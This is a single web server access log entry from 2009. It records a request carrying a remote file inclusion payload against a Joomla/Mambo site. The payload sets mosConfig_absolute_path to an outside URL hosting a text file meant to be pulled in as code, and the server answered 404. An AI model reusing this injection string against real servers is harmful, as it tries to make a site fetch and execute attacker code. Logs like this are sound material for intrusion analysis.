218.149.85.37 - - [04/Jun/2009:01:57:59 -0400] "GET /logs/access_log.Q109051700//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
